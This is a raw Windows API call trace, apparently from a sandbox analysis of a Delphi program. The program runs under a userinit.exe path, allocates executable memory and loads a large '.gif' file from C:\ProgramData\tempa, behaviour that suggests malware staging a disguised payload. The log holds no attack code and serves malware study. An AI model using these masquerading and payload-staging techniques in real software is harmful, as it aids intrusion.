[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0117.141] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0117.141] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0117.141] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0117.141] GetDC (hWnd=0x0) returned 0x1801089c
[0117.141] GetDeviceCaps (hdc=0x1801089c, index=90) returned 96
[0117.141] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0117.141] GetDC (hWnd=0x0) returned 0x1801089c
[0117.141] GetDeviceCaps (hdc=0x1801089c, index=104) returned 0
[0117.141] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0117.141] CreatePalette (plpal=0x1af500) returned 0x4508085a
[0117.141] GetStockObject (i=7) returned 0x1b00017
[0117.141] GetStockObject (i=5) returned 0x1900015
[0117.141] GetStockObject (i=13) returned 0x18a002e
[0117.141] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0117.141] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0117.141] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0117.142] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0117.143] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x1af4fc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0117.143] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0117.144] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0117.144] GetVersion () returned 0x1db10106
[0117.144] GetCurrentProcessId () returned 0xfc8
[0117.144] GlobalAddAtomA (lpString="Delphi00000FC8") returned 0xc13c
[0117.144] GetCurrentThreadId () returned 0xfcc
[0117.144] GlobalAddAtomA (lpString="ControlOfs0040000000000FCC") returned 0xc13b
[0117.144] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000FCC") returned 0xc16c
[0117.144] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0117.144] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0117.144] GetSystemMetrics (nIndex=19) returned 1
[0117.150] GetSystemMetrics (nIndex=75) returned 1
[0117.150] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1281310, fWinIni=0x0 | out: pvParam=0x1281310) returned 1
[0117.150] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0117.150] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0117.150] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x40217
[0117.150] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0117.150] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0117.150] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0117.150] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x40215
[0117.151] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x401f5
[0117.151] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x401f3
[0117.151] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x401c3
[0117.151] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x401c1
[0117.151] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x401bd
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0117.152] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0117.152] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0117.152] GetDC (hWnd=0x0) returned 0x1801089c
[0117.152] GetDeviceCaps (hdc=0x1801089c, index=90) returned 96
[0117.152] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0117.152] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0117.152] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x128155c) returned 1
[0117.152] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x1af867, fWinIni=0x0 | out: pvParam=0x1af867) returned 1
[0117.152] CreateFontIndirectA (lplf=0x1af867) returned 0x1c0a088c
[0117.152] GetObjectA (in: h=0x1c0a088c, c=60, pv=0x1af658 | out: pv=0x1af658) returned 60
[0117.153] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x1af713, fWinIni=0x0 | out: pvParam=0x1af713) returned 1
[0117.153] CreateFontIndirectA (lplf=0x1af7ef) returned 0x260a0836
[0117.153] GetObjectA (in: h=0x260a0836, c=60, pv=0x1af658 | out: pv=0x1af658) returned 60
[0117.153] CreateFontIndirectA (lplf=0x1af7b3) returned 0x170a0821
[0117.153] GetObjectA (in: h=0x170a0821, c=60, pv=0x1af658 | out: pv=0x1af658) returned 60
[0117.153] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0117.153] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x1af7c7, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0117.153] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x1af7c7 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0117.153] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0117.153] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x1af77c | out: lpWndClass=0x1af77c) returned 0
[0117.153] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0117.153] GetSystemMetrics (nIndex=0) returned 1440
[0117.153] GetSystemMetrics (nIndex=1) returned 900
[0117.153] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x401e4
[0117.157] SetWindowLongA (hWnd=0x401e4, nIndex=-4, dwNewLong=856047) returned 4219500
[0117.157] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0117.157] SendMessageA (hWnd=0x401e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0117.157] DefWindowProcA (hWnd=0x401e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0117.171] DefWindowProcA (hWnd=0x401e4, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x401bb
[0117.172] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0117.172] SetClassLongA (hWnd=0x401e4, nIndex=-14, dwNewLong=65575) returned 0x0
[0117.173] GetSystemMenu (hWnd=0x401e4, bRevert=0) returned 0x401b5
[0117.175] DeleteMenu (hMenu=0x401b5, uPosition=0xf030, uFlags=0x0) returned 1
[0117.175] DeleteMenu (hMenu=0x401b5, uPosition=0xf000, uFlags=0x0) returned 1
[0117.175] DeleteMenu (hMenu=0x401b5, uPosition=0xf010, uFlags=0x0) returned 1
[0117.176] GetKeyboardLayoutList (in: nBuff=64, lpList=0x1af748 | out: lpList=0x1af748) returned 1
[0117.177] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0117.177] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0117.178] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0117.178] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0117.178] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0117.178] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0117.178] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0117.179] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0117.179] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0117.179] GetCurrentThreadId () returned 0xfcc
[0117.179] GlobalAddAtomA (lpString="WndProcPtr0040000000000FCC") returned 0xc13a
[0117.179] VirtualAlloc (lpAddress=0x1284000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1284000
[0117.179] ShowWindow (hWnd=0x401e4, nCmdShow=0) returned 0
[0117.179] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0117.179] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0117.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1af4c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1af4c8*=0) returned 0x0
[0117.179] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1af4c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1af4c0*=0) returned 0x0
[0117.180] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1af4c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1af4c0*=0) returned 0x10be00
[0117.180] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1af4c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1af4c0*=0) returned 0x0
[0117.180] GlobalLock (hMem=0x1460004) returned 0x2310020
[0117.180] ReadFile (in: hFile=0x98, lpBuffer=0x2310020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x1af4dc, lpOverlapped=0x0 | out: lpBuffer=0x2310020*, lpNumberOfBytesRead=0x1af4dc*=0x10be00, lpOverlapped=0x0) returned 1
[0117.265] CloseHandle (hObject=0x98) returned 1
[0117.266] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.266] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.266] GlobalUnlock (hMem=0x146000c) returned 0
[0117.266] GlobalReAlloc (hMem=0x146000c, dwBytes=0x4000, uFlags=0x2) returned 0x146000c
[0117.266] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.267] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.267] GlobalUnlock (hMem=0x146000c) returned 0
[0117.267] GlobalReAlloc (hMem=0x146000c, dwBytes=0x6000, uFlags=0x2) returned 0x146000c
[0117.267] GlobalLock (hMem=0x146000c) returned 0x2aa820
[0117.268] GlobalHandle (pMem=0x2aa820) returned 0x146000c
[0117.268] GlobalUnlock (hMem=0x146000c) returned 0
[0117.268] GlobalReAlloc (hMem=0x146000c, dwBytes=0x8000, uFlags=0x2) returned 0x146000c
[0117.268] GlobalLock (hMem=0x146000c) returned 0x2b0830
[0117.269] GlobalHandle (pMem=0x2b0830) returned 0x146000c
[0117.269] GlobalUnlock (hMem=0x146000c) returned 0
[0117.269] GlobalReAlloc (hMem=0x146000c, dwBytes=0xa000, uFlags=0x2) returned 0x146000c
[0117.269] GlobalLock (hMem=0x146000c) returned 0x2b0830
[0117.269] GlobalHandle (pMem=0x2b0830) returned 0x146000c
[0117.269] GlobalUnlock (hMem=0x146000c) returned 0
[0117.269] GlobalReAlloc (hMem=0x146000c, dwBytes=0xc000, uFlags=0x2) returned 0x146000c
[0117.270] GlobalLock (hMem=0x146000c) returned 0x2ba840
[0117.270] GlobalHandle (pMem=0x2ba840) returned 0x146000c
[0117.270] GlobalUnlock (hMem=0x146000c) returned 0
[0117.271] GlobalReAlloc (hMem=0x146000c, dwBytes=0xe000, uFlags=0x2) returned 0x146000c
[0117.271] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.271] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.271] GlobalUnlock (hMem=0x146000c) returned 0
[0117.271] GlobalReAlloc (hMem=0x146000c, dwBytes=0x10000, uFlags=0x2) returned 0x146000c
[0117.271] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.271] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.272] GlobalUnlock (hMem=0x146000c) returned 0
[0117.272] GlobalReAlloc (hMem=0x146000c, dwBytes=0x12000, uFlags=0x2) returned 0x146000c
[0117.272] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.272] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.272] GlobalUnlock (hMem=0x146000c) returned 0
[0117.272] GlobalReAlloc (hMem=0x146000c, dwBytes=0x14000, uFlags=0x2) returned 0x146000c
[0117.272] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.272] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.272] GlobalUnlock (hMem=0x146000c) returned 0
[0117.273] GlobalReAlloc (hMem=0x146000c, dwBytes=0x16000, uFlags=0x2) returned 0x146000c
[0117.273] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.273] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.273] GlobalUnlock (hMem=0x146000c) returned 0
[0117.273] GlobalReAlloc (hMem=0x146000c, dwBytes=0x18000, uFlags=0x2) returned 0x146000c
[0117.273] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.273] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.273] GlobalUnlock (hMem=0x146000c) returned 0
[0117.274] GlobalReAlloc (hMem=0x146000c, dwBytes=0x1a000, uFlags=0x2) returned 0x146000c
[0117.274] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.274] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.274] GlobalUnlock (hMem=0x146000c) returned 0
[0117.274] GlobalReAlloc (hMem=0x146000c, dwBytes=0x1c000, uFlags=0x2) returned 0x146000c
[0117.274] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.275] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.275] GlobalUnlock (hMem=0x146000c) returned 0
[0117.275] GlobalReAlloc (hMem=0x146000c, dwBytes=0x1e000, uFlags=0x2) returned 0x146000c
[0117.275] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.275] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.275] GlobalUnlock (hMem=0x146000c) returned 0
[0117.275] GlobalReAlloc (hMem=0x146000c, dwBytes=0x20000, uFlags=0x2) returned 0x146000c
[0117.275] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.276] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.276] GlobalUnlock (hMem=0x146000c) returned 0
[0117.276] GlobalReAlloc (hMem=0x146000c, dwBytes=0x22000, uFlags=0x2) returned 0x146000c
[0117.277] GlobalLock (hMem=0x146000c) returned 0x2c6820
[0117.278] GlobalHandle (pMem=0x2c6820) returned 0x146000c
[0117.278] GlobalUnlock (hMem=0x146000c) returned 0
[0117.278] GlobalReAlloc (hMem=0x146000c, dwBytes=0x24000, uFlags=0x2) returned 0x146000c
[0117.278] GlobalLock (hMem=0x146000c) returned 0x2c6820
[0117.278] GlobalHandle (pMem=0x2c6820) returned 0x146000c
[0117.278] GlobalUnlock (hMem=0x146000c) returned 0
[0117.278] GlobalReAlloc (hMem=0x146000c, dwBytes=0x26000, uFlags=0x2) returned 0x146000c
[0117.281] GlobalLock (hMem=0x146000c) returned 0x2ea830
[0117.281] GlobalHandle (pMem=0x2ea830) returned 0x146000c
[0117.281] GlobalUnlock (hMem=0x146000c) returned 0
[0117.281] GlobalReAlloc (hMem=0x146000c, dwBytes=0x28000, uFlags=0x2) returned 0x146000c
[0117.282] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.282] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.282] GlobalUnlock (hMem=0x146000c) returned 0
[0117.282] GlobalReAlloc (hMem=0x146000c, dwBytes=0x2a000, uFlags=0x2) returned 0x146000c
[0117.282] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.282] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.282] GlobalUnlock (hMem=0x146000c) returned 0
[0117.282] GlobalReAlloc (hMem=0x146000c, dwBytes=0x2c000, uFlags=0x2) returned 0x146000c
[0117.283] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.283] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.283] GlobalUnlock (hMem=0x146000c) returned 0
[0117.283] GlobalReAlloc (hMem=0x146000c, dwBytes=0x2e000, uFlags=0x2) returned 0x146000c
